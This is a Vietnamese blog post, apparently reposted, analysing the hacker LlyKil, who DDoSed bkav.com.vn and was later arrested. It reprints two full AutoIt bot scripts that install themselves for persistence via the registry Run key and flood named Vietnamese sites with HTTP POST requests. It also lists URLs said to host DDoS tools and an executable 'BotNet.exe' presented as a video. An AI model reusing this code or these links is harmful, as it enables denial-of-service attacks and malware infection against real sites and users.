Trang chủ > Bảo Mật - Bài Viết Phân Tích > LlyKil – người đã DDoS bkav.com.vn

LlyKil – người đã DDoS bkav.com.vn

Vậy là sao mà LliKil bị bắt ?
Theo tôi nghĩ thì việc bắt được LliKil không có gì khó, theo tìm hiểu của tôi LlyKil không giấu các thông tin cá nhân khi thực hiện tấn công. Có thể LlyKil nghĩ đó chỉ là một trò chơi ?
Bắt đầu bằng việc phần tích một vài file code dùng để tấn công (tìm không khó lắm)

#NoTrayIcon
#region
#AutoIt3Wrapper_res_comment=jhg
#AutoIt3Wrapper_res_description=jhgjhg
#AutoIt3Wrapper_res_fileversion=jhgjhg
#AutoIt3Wrapper_res_legalcopyright=jhgjhg
#endregion
$PROCESS = ProcessList("chem.exe")
If $PROCESS[0][0] > 3 Then Exit
FileCopy(@ScriptFullPath, @SystemDir & "\chem.exe", 1)
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Win dows\CurrentVersion\Run",
"chem", "REG_SZ", @SystemDir & "\chem.exe")
$1 = IniRead(@SystemDir & "\chem.ini", "1", "1", "")
IniWrite(@SystemDir & "\chem.ini", "1", "1", $1 + 1)
If $1 = 2 Then
RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Wi ndows\CurrentVersion\Run", "chem")
EndIf
TCPStartup()
Dim $TIN[3]
$TIN[0] = "bkav.com.vn"
$TIN[1] = "bkav.com.vn"
$TIN[2] = "bkav.com.vn"
While 1
$NGAUNHIEN = Random(0, 2, 1)
$DATASIZE = StringLen("")
$HOST = $TIN[$NGAUNHIEN]
$PAGE = "/home.aspx"
$SOCKET = TCPConnect(TCPNameToIP($HOST), 80)
$COMMAND = "POST " & $PAGE & " HTTP/1.1" & @CRLF
$COMMAND &= "Host: " & $HOST & @CRLF
$COMMAND &= "User-Agent: top1.vn" & @CRLF
$COMMAND &= "Connection: close" & @CRLF
$COMMAND &= "Referer: http://top1.vn" & @CRLF
$COMMAND &= "Content-Type: application/x-www-form-urlencoded" & @CRLF
$COMMAND &= "Content-Length: " & $DATASIZE & @CRLF
$COMMAND &= "Authorization: Basic QG11dmlldDpAbXV2aWV0" & @CRLF
$COMMAND &= "" & @CRLF
TCPSend($SOCKET, $COMMAND)
WEnd

Một đoạn code khác :

#NoTrayIcon
#region
#AutoIt3Wrapper_res_comment=jhg
#AutoIt3Wrapper_res_description=jhgjhg
#AutoIt3Wrapper_res_fileversion=jhgjhg
#AutoIt3Wrapper_res_legalcopyright=jhgjhg
#endregion
$PROCESS = ProcessList("khpt.exe")
If $PROCESS[0][0] > 3 Then Exit
FileCopy(@ScriptFullPath, @SystemDir & "\khpt.exe", 1)
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Win dows\CurrentVersion\Run", "khpt",
 "REG_SZ", @SystemDir & "\khpt.exe")
$1 = IniRead(@SystemDir & "\khpt.ini", "1", "1", "")
IniWrite(@SystemDir & "\khpt.ini", "1", "1", $1 + 1)
If $1 = 5 Then
RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Wi ndows\CurrentVersion\Run", "khpt")
EndIf
TCPStartup()
Dim $TIN[3]
$TIN[0] = "khpt.vn"
$TIN[1] = "khpt.vn"
$TIN[2] = "khpt.vn"
While 1
$NGAUNHIEN = Random(0, 2, 1)
$DATASIZE = StringLen("")
$HOST = $TIN[$NGAUNHIEN]
$PAGE = "/forum//index.php"
$SOCKET = TCPConnect(TCPNameToIP($HOST), 80)
$COMMAND = "POST " & $PAGE & " HTTP/1.1" & @CRLF
$COMMAND &= "Host: " & $HOST & @CRLF
$COMMAND &= "User-Agent: LlyKil" & @CRLF
$COMMAND &= "Connection: close" & @CRLF
$COMMAND &= "Referer: http://google.com" & @CRLF
$COMMAND &= "Content-Type: application/x-www-form-urlencoded" & @CRLF
$COMMAND &= "Content-Length: " & $DATASIZE & @CRLF
$COMMAND &= "Authorization: Basic QG11dmlldDpAbXV2aWV0" & @CRLF
$COMMAND &= "" & @CRLF
TCPSend($SOCKET, $COMMAND)
WEnd

Đoạn này có thông tin rất cụ thể về LliKil
$COMMAND &= “User-Agent: LlyKil” & @CRL

Hành động của LlyKil thực ra đã bị nhiều hệ thống ghi nhận và phát hiện. Các đoạn mã LlyKil

viết bằng AutoIt3.


Trên hình ảnh đã mô tả rõ đặc tính của các chương trình do LlyKil viêt ra : như có kết nối qua IRC kênh #LlyKil,… (điều này sẽ thấy rõ hơn trong video LlyKil tự quay khi DDoS truongton.net).

Một trong các cách phán toán bot là LlyKil viết chương trình crack BKAV Pro và tung lên mạng (crack dc hay ko thì tôi không chắc big grin )

Một trong số các site chứa mã DDoS hiện nay vẫn tồn tại đó là :
http://diemhen.net/llykil/Server.php
http://diemhen.net/llykil/Update.exe

LlyKil từng lưu trữ các dữ liệu và công cụ phục vụ tấn công trên nhiều site trong đó có trang của chính LlyKil http://llykil.net/
Hình ảnh trang chu trang nay do google cache lại được:

Hình ảnh trên một server khác, nơi được dùng để chứa đồ nghề.

Với những dâu vết để lại như vậy cộng thêm log file của máy chủ thì không khó khăn lắm để có thể nhận ra ai là chủ các cuộc tấn công DDoS trong thời gian qua.
LlyKil đã bị bắt là tấm gương cho các bạn đang đi theo con đường này.
DDoS là một hành vi xấu, ngay cả với giới hacker DDoS được coi là “chơi bẩn”. Tuy nhiên để thực hiện được các vụ DDoS cũng đòi hỏi có hiểu biết nhất định. Để chống DDoS mà không biết về DDoS thì thật là khó. Tôi hy vọng những bạn có hiểu biết về DDoS không dùng vào mục đích tấn công.

Bonus:
Link download video LlyKil thực hiện DDoS
http://rapidshare.com/files/156695449/BotNet.exe.html

Goodluck! – Sưu Tầm

  1. Chưa có phản hồi.
  1. No trackbacks yet.

Gửi phản hồi

Mời bạn điền thông tin vào ô dưới đây hoặc kích vào một biểu tượng để đăng nhập:

WordPress.com Logo

Bạn đang bình luận bằng tài khoản WordPress.com Log Out / Thay đổi )

Twitter picture

Bạn đang bình luận bằng tài khoản Twitter Log Out / Thay đổi )

Facebook photo

Bạn đang bình luận bằng tài khoản Facebook Log Out / Thay đổi )

Google+ photo

Bạn đang bình luận bằng tài khoản Google+ Log Out / Thay đổi )

Connecting to %s

%d bloggers like this: